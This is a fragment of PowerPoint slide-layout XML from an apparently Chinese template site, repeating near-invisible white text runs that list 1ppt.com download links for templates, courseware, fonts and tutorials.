              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout221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21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21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21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2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22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22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22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22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22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22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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout222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22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22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22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2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23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23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23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23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23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23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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout223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23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23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23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2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24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24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24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24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24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24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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
